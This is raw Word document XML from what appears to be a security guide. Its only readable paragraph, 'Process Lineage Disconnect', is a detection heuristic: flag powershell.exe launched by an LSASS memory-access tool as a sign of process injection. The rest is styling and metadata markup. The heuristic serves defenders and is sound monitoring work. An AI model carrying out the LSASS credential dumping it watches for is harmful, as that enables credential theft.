          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Process Lineage Disconnect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42309AC0" w14:textId="0D76AA95" w:rsidR="002D273F" w:rsidRPr="002D273F" w:rsidRDefault="002D273F" w:rsidP="002D273F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Monitor endpoint detection logs for processes spawned out of atypical parent context. For example, if a powershell. Exe instance is generated directly by an LSASS memory access tool rather than via standard system frameworks (explorer.exe or services.exe), this strongly indicates process injection.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0408F4A7" w14:textId="77777777" w:rsidR="002D273F" w:rsidRPr="002D273F" w:rsidRDefault="002D273F" w:rsidP="002D273F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="0469CB40">
          <v:rect id="_x0000_i1112" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="215FD6A5" w14:textId="536F35B8" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6154B9D3" w14:textId="443F113A" w:rsidR="002D273F" w:rsidRPr="00133311" w:rsidRDefault="002D273F" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002D273F" w:rsidRPr="001333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A1621"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="532C4CD0"/>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4A2E9F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70840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6C6722"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8834A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B04E60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F0C5C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68017E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4F83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CD488D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85FA69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6D44A61"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71CE6BA8"/>
    <w:lvl w:ilvl="0" w:tplc="D6CC0D5A">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsiaTheme="minorEastAsia"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5EAD5897"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC243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8614C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1AD0E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0748847">
    <w:abstractNumId w:val="6"/>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2137411303">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1136871971">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1409033900">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="166943777">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="301617404">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1777019228">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="454761637">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="127344160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074"/>
    <w:rsid w:val="00061C1A"/>
    <w:rsid w:val="000B6E74"/>
    <w:rsid w:val="00133311"/>
    <w:rsid w:val="001C16B0"/>
    <w:rsid w:val="002D273F"/>
    <w:rsid w:val="002F07A2"/>
    <w:rsid w:val="00480F8E"/>
    <w:rsid w:val="004874C1"/>
    <w:rsid w:val="0055795F"/>
    <w:rsid w:val="005D3438"/>
    <w:rsid w:val="00625432"/>
    <w:rsid w:val="00631074"/>
    <w:rsid w:val="009151D7"/>
    <w:rsid w:val="00941DF8"/>
    <w:rsid w:val="00A435E7"/>
    <w:rsid w:val="00B4067B"/>
    <w:rsid w:val="00B47558"/>
    <w:rsid w:val="00BD330B"/>
    <w:rsid w:val="00CF25A7"/>
    <w:rsid w:val="00D5581E"/>
    <w:rsid w:val="00D66D8A"/>
    <w:rsid w:val="00DE4058"/>
    <w:rsid w:val="00DF2381"/>
    <w:rsid w:val="00E24645"/>
    <w:rsid w:val="00E24DE9"/>
    <w:rsid w:val="00E303E6"/>
    <w:rsid w:val="00E96FF2"/>
    <w:rsid w:val="00F007AA"/>
    <w:rsid w:val="00F46DD2"/>
    <w:rsid w:val="00F54F43"/>
    <w:rsid w:val="00FC42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F0C3D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5980943F-217F-4C46-8697-C0C0D4CE9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10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10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10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10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10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10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10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10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10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10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10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10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10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10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10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10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10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1074"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="006310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10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10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10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1074"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00631074"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00631074"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00631074"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="006310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1074"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00631074"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D66D8A"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D66D8A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00D66D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z1qcye">
    <w:name w:val="z1qcye"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B4067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286pc">
    <w:name w:val="t286pc"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B4067B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B40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4067B"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="undefined">
    <w:name w:val="undefined"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B406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 dockstate="right" visibility="0" width="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A968654B-16BF-429C-8110-3F4ACD84C2C2}">
  <we:reference id="wa104382008" version="1.1.0.2" store="en-US" storeType="OMEX"/>
  <we:alternateReferences>
    <we:reference id="WA104382008" version="1.1.0.2" store=""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772773B2-582F-473B-83E3-87A8036C6358}">
  <we:reference id="wa200000011" version="1.0.1.0" store="en-US" storeType="OMEX"/>
  <we:alternateReferences>
    <we:reference id="WA200000011" version="1.0.1.0"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3</TotalTime>
  <Pages>27</Pages>
  <Words>6831</Words>
  <Characters>38938</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Yvonne Angelica</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yvonne Angelica</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-07T00:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-07T00:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>